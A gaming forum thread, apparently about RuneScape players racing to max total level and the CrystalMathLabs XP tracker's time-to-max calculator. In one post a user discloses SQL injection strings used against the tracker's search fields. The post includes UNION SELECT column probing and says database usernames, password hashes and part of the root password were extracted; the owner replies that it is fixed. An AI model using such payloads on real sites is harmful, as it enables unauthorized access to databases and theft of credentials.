  1. as much as it's fun following updates it is incredibly sad. how is 100 hours a week on any game ok?

    14.28 hours a day

Heres a 100 hour work week

6 am, shower, get dressed, eat

    7 am start grind

    12 noon eat

    1 start grinding again

    10:20pm call it a night

This is 7 days a week. Yeah I dont know how anyone can do this schedule following any job or hobby.

RuneScape is a job and a hobby.

  2. Dear Foot --

I tried messaging you in game as well as through your site, without luck. I see an error in your graphs on crystalmathlabs. As an example, Jabberwoky's graph for total level shows 2011, however he only has 2004 total levels. Jebrim's graphed levels are also inflated. I'm only giving a heads up to let you know that some calculations somewhere are incorrect. I hope this is not too far off topic since it pertains to a tracking site ran by a top 5.

And Kaida, the only person directly accused of botting was in fact banned. If anyone follows the 'rules' to a T, it is Jebrim. So please ease up on your trigger finger.

This is not an error. What is graphed is virtual total levels, not skills clamped at lvl 99. Jabberwoky has lvl 103 defence and lvl 102 hitpoints.

  3. Just a reminder everyone, accusing people of botting (or any form of cheating for that matter) is not allowed, no matter how suspicious their xp gains may be.

If someone is banned for it, then you may discuss them all you like. But until then, everyone must follow our Naming Names rule.

Okay, but Pantherzebu was banned earlier today. He was banned before I wrote the post too, so I'll say it again. Pantherzebu was a bot that had bots running him essence at the nature altar. Also, I didn't conclude he was a bot due to his XP gains. I traded him ingame a dozen times and he'd always do the same strange thing when I did so.

  4. Y

gratz to jebrim on 99 fm, hes doing prayer next i believe

He's 99 Prayer now too. gf

buyable prod. He'll burn out once he hits the slow skills.

lol probably most stupid post i ever seen about jebrim...

first look at his stats before posting shit...

I posted that on the 13th of june, and gemeos's comment was on the 15th ( two days later, incase you can't count either)

jebrim got 99 prayer the day after i made the post.

i'll let you figure out the rest.

sorry for digging up and old post, just thought i'd offer swisscooler a bit of 'assistance'

I believe Swisscooler was responding to "buyable prod. He'll burn out once he hits the slow skills."

  5. Jabberwoky told me that foot's calculator overestimates xp/hr based on his average rates, so his hours to max are inflated. He also told me that he made around 400m from slayer, which will allow him to use runners for most if not all of runecrafting, inflating his hours to max even more. All of this coupled with the fact that he's outpacing Jebrim gives me hope that someone who doesn't suffer from a rare form of autism might max first.

Actually his hours to max wouldn't change based on slayer xp rates since he is 99 Slayer, so it's not logical to say his hours are inflated. Rather, everybody who is not 99 Slayer has "deflated" hours assuming the Slayer rates are overestimated.

This is such a pointless semantical argument; it's something Jebrim would do to deflect the actual point and condecsend at the same time, but I'll rephrase to appease you: his hours are inflated with respect to everyone elses' hours. Also, when i was getting 99 smithing I timed a few perfect inventories and extrapolated the max superheats/hr to be ~1886. 1800 casts/hr is a pretty easily maintainable average, but it doesn't surprise me at all that Jebrim does around 1500/hr.

It's unnecessary to talk about how perfect my perfect inventories were btw. I'm positive that I timed them correctly, and if truely perfect inventories are any faster it would be irrelevant to the point I was making anyway.

I wasn't even trying to argue or refute what you said at all. I say this because I've seen that many people have this misconception that somehow it takes more hours to gain 0 Slayer xp at 20k xp/h than it would to gain 0 Slayer xp at 25k xp/h.

  7. Certainly the low lvl Slayer rate is too low. I got 200k Slayer XP in a day at around level 55. The rate at that lvl is only 10k xp/h atm. I believe I also did a few quests and unlocked piety during that time. I certainly did not slay for 20 hours.

I believe Foot got both, so lets see if he adjusts his calculator rates. And wouldn't Jebrim have Lunars from doing astrals? (or did he balloon laws to 91?) I'm not active in 07 and can't remember all the details.

  8. I personally think foot will burn out.

i don't think that, he used to play proefficiently everday for years.

these few months, maybe a year won't burn him out i think

He may have been proficient in his playing for many years, but he did to my recollection burn out, before hitting the 'big leagues'.

Are you trying to say I'll quit before I even max? You even admitted that I played proficiently for "many years." Why do you think playing for 7-8 months to max total is a problem for me at all? Also, I don't consider myself to have burnt out of runescape. What triggered me quitting was the refer a friend for bonus xp update, not any psycological change that I went through.

That staking session with starry had nothing to do with it either right.

What the [bleep] are you talking about? When I say "quit" I mean I quit playing for XP. Staking came after that.

  10. Thanks a lot for this. I really learned a lot of SQL injection from using this website.

    "View your prog" injection:

The following shows all data points in your database in a single choppy graph

    alkan' or '1'='1

Combines the graph of alkan and leyatis in one!

    alkan' or Name='leyatis

    "Goals" search injection:

Shows all goals in the search list

    ' or '1'='1

' union select * from goals where '1'='1

After the query above, I started doing

    ' union select all 1,2,'a <FAIL

    then

    ' union select all 1,2,3,'a <FAIL

    then

    ' union select all 1,2,3,4,'a <FAIL

    until finally this worked

    ' union select all 1,2,3,4,5,6,7,'a <WIN

Since it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this.

    oh sh1t.

thanks man, you helped a lot, i completely forgot to escape mysql strings.

    begginners mistakes.

    fixed now though.

Not a problem. I had a lot of fun.

  11. I may change slayer past lvl 90 to 24k xp/h. I also will lower the smithing xp rate, raise farming xp rate, and perhaps account for the agility and mining xp from the abyss.

Also, you can now show time graphs for a 99 all skills goal. Just put "&target=13034431" at the end of the URL.

    http://www.crystalmathlabs.com/tracker/timegraph.php?user=foot&time=604800&target=13034431

This isn't a polished feature, so the graph title still says 200m all skills. Also, there is no link to change goal to 99 all yet. I'm just busy.

  12. Your melee and ranged lvl affects slayer's xp rate much more than unlocking any task.

Doesn't cannon accuracy use the same formula for attack roll as your current style/weapon? So ranged level wouldn't effect it?

That's not a very good question to ask me. I'm far from an expert in slayer or combat. I remember being told cannons are very inaccurate at low ranged lvls. There's probably more to cannon accuracy than just your weapon.

  13. if the xp rate was right why is it nobody can get past even 22k/h on the daily record when they clearly have a 6+hour log ontop of 24h slay lol, 25k is unreachable, and increasing it to that when you unlock dark beasts is just absurd, they lower xp rates if anything due to the fact you get like 12 for a task. 20k/h is reasonable if you get good tasks and power slay to max efficiency but that's rng due to the chance of just getting shit tasks over and over, so saying 180 hours out is pretty reasonable imho

The increase to 25k xp/h when you unlock dark beasts was unintentional. Optimally, you don't even complete MEP2. The Slayer xp rates are very hard to determine. The changes based on slayer xp are just approximations. Your melee and ranged lvl affects slayer's xp rate much more than unlocking any task. And why do you think I'm foolish enough to base xp rates on day records? People rarely even try for a full 30 hour day record. Those who do never get perfect xp rates the entire time. Since I have 48 slayer and nobody has told me exact xp rates, I had to estimate. I'm open for constructive criticism on the xp rates, but you have no credibility.

  14. not quite sure why jebrim see's himself so highly rated in the time to max considering as soon as he does slay he will drop 180+ hours due to huge inaccuracy in the 'most efficient xp rates'

I should be 1st on the site tomorrow. However, if you make manual adjustments to correct the xp rate inaccuracies in the calculator, I'm already in 1st right now. :)

he seemed to be very informative about the wrong xp rates when wasn't 1st though :?

but im sure he made up for those 200 hours he will lose by being so much more efficient fishing/agi than anybody else could

Slayer is off by 180 hours you say? That may be true on the first release of the time to max page, but I have made many revisions to XP rates and the algorithm as a whole since then. After he was first, I made a major change to how the time is calculated. Besides, Jebrim's complaints were that the slayer xp rate was too low and that people like Razzeh and Dark Lust were higher up on the list than they should have been. Your logic just doesn't make sense. If you want to attack Jebrim on something, talk about how he dropped out of college to get rank 1, has like 90 quest points, and has never even powerslayed.

  15. Because there's a community of people that hang out together and train Agility. During my race to 99, I added almost everyone in the top page of Agility and got them using my chat. After I closed it and left, they went off and formed their own chat. I'm happy with them and visit sometimes and sell them energies too. :) I've always been big on having an Agility community and knowing everyone that does it and having them get to know each other too. :)

Wow! Then is there an even bigger mining and fishing community?

  16. I excluded a lot of skills from the price calculator because they require you to sell back the things you create and that players used a variety of different things to train crafting and herblore.

The magic xp rate was because I was lazy really. Besides, the time is calculated by superheating gold, so magic shouldn't be much of an issue. The small bit of magic you do need to do can be done while fishing and teleporting when astral runecrafting.

Look into putting your rates into an object instead of an array.

Sure, logically that would make sense. I just see no benefit in doing this.

  17. Hello, I have something you all may be interested in.

    http://www.crystalma...r/timetomax.php

I made this around a week ago, but I never released it because it's probably very inaccurate. The current code only makes very rough estimates of xp/h in skills and doesn't account for the skill's level to calculate time from maxed total. This sounds like a lot of work to me, which is why I don't want to do it. Another problem is that the RuneCrafting xp rates varies greatly depending on if runners are used.

I just made a large modification to the code that calculates time to maxed total. These modifications account for level differences causing different XP rates. These XP gains may be tweaked later when I can gather more data for XP rates.

You can see the new algorithm by looking at the JavaScript code on this page:

    http://crystalmathla...uppliescalc.php

    var Rates=new Array(0,0,0,0,0,0,
    new Array(0,350000), //Prayer

    new Array(0,10000, 2411,50000, 13363,80000, 61512,150000, 273742,200000, 1210421,550000), //Farming
    new Array(0,8000, 2107,20000, 1210421,25000, 2421087,29000, 5902831,50000), //Runecrafting
    new Array(0,5000, 12031,40000, 247886,80000, 1986068,100000), //Hunter
    new Array(0,20000, 18247,100000, 101333,250000, 1096278,360000) //Construction
    );

    new Array(0,8000, 2107,20000, 1210421,25000, 2421087,29000, 5902831,50000) //Runecrafting

This means you get 8000 xp/h starting at 0 xp (level 1), and 20000 xp/h starting at 2107 xp (level 14) with fire runes ect. I'm not sure about these xp rates which is why I'm taking the time to explain the code.

  19. This isn't offtopic because we are supposed to discuss the most efficient methods to top players achieve this goal.

    http://www.youtube.com/watch?v=9YYNrcl-1_o

Might need to pause sometimes to read, sorry about that.

Some things I forgot to mention when making this vid:

    - Xp rate: 280k if you have Sceptre of Gods and 260k if you don't

    - It doesn't matters the spikes you choose in the rooms 2,4,5 and 6.

    - You should only open the urns in the rooms 2, 4, 5, 6 (first version) if you are sure you are going to open all urns in the two last rooms because each chest cost 1 tick.

    - Each time I bank I take 3 summon potion (4), 12 bunyips and 2 prayer renewal (4)

    - Recharge your sceptre with gold so you need less spaces avaible so less banking

Feel free to ask your questions and thanks for watching.

Thanks Foot for correcting this guide.

ur doen room 6 rong. If you want to only lose one tick opening the chest, after the first door click 1 square southwest of the chest and then search the chest. If you do it right you only lose one tick opening it. It's much better than waiting after door 2 and leaving room 6 1/2 of the time before even getting the chest. When I was pping I gave up even waiting to search room 6 chest only when it was in my direct path. I figured losing 300 xp 1/4 of the time wasn't worth the tick saved. It's a trivial difference that can only be solved if you know the exact rate of failing the room 6 chest and room 8 urns. I still think searching chest in room 2 is for [bleep]s. But it depends on how often you don't have time for every urn, which I'd imagine to be quite often with the 3 new urns (I haven't plundered since this update).

  20. Haven't the last 2 rooms changed slightly since zarfot was around anyway?

That's not the point. Zarfot/foot always lost 3 ticks in the last room (2 if you need to go to exit door). Also, they didn't do the chests in room 1 and 2. Chests in room 1 and 2 are xp with no time spent, so why wouldn't I do it...

You lose a tick from searching a chest, even if it's in your direct path. Where are you getting this shit from? I would search chests in room 4, 5 and 6 if they are in my direct path, but not rooms 1-3 for such shit xp.

Searching chest in room 1 is 240k xp/h if it takes 1 tick to do. Chest in room 2 is about 360k xp/h. This is assuming you don't end up losing out on a few urns in the last room. For each tick you lose, i think you have about a 1/8 chance of missing out on an urn in room 8? Also, in room 7 in the video, he missed a tick by skipping the last urn rather than the second to last.

Oh, i'm reading again where I got the "shit" from... Unless someone edited it (owell), I readed wrong. Ok fixing, thanks!

Also, you're suppose to click teleport before the loading screen to leave the pyramid even starts (refer to my old ass pp vid, at very start of the video). This allows you to start teleporting even when you're still loading. That saves like 3 ticks on its own, which completely trumps any other silly tryharding which may or may not even be efficient.

  21. Haven't the last 2 rooms changed slightly since zarfot was around anyway?

  22. To be honest, cheaters of any kind deserve punishment.

He was already maxed total though, what did he cheat? Less than 0.1% of his total xp.

At aviansies, you can frequently lookup names and find bots with 50m+ ranged xp, I've seen a few with 80m+. Priorities.

He actually cheated about 0.059% of his total xp in a skill that is 450k xp/h anyway. In return, he lost about 2.6% of his total xp and lost rank 44 dg and maxed total. Is that really fair Langer?

  23. Apparently I was wrong about a few things. I got a message from Mod Mat K saying why I was banned

    http://gyazo.com/9be6a4156ee621559dfd919e830a9569

Dumb reason for getting a forum ban, no warning at all either. I was joking to this guy who didn't know what I was talking about when I made a thread about Bu11seye00's account locked. Apparently Jagex thinks somebody else has access to Bu11seye00's account and is denying his attempts to get his account unlocked. He tried recovering his account like 5 times too, using flawless recovery answers. It's so damn funny, since my friend got hacked a few months ago because somebody knew ONE of his old passwords. meh
